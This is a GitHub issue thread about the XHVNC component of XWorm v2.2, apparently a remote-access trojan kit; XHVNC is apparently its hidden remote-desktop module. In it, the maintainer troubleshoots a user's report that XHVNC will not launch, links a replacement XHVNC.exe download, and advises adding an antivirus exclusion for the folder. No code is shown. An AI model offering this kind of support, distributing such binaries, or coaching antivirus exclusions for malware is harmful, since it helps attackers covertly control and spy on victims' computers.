### ISSUE TITLE
HI, XHVNC don't open

### ISSUE THREAD

**Issue by theguyismyname** [De-eloper/XWorm-v2.2#2]
Xhvnc does not open, I try to open it but it does not open

**Comment by De-eloper** [comment]
Is there any error message or crashes? I'm looking into this right now.

**Comment by theguyismyname** [comment]
It does not throw any message, nothing is shown when clicking

**Comment by De-eloper** [comment]
Try replacing XHVNC.exe with this version:
[XHVNC.zip](https://github.com/De-eloper/XWorm-v2.2/files/10090499/XHVNC.zip)

Otherwise could be that it's missing components, it should be in the same folder as XWorm itself. Make sure you have antivirus exclusion for the folder.

**Comment by De-eloper** [comment]
Yeah, I think XHVNC is buggy, it's based on another source too. So it's not very reliable.
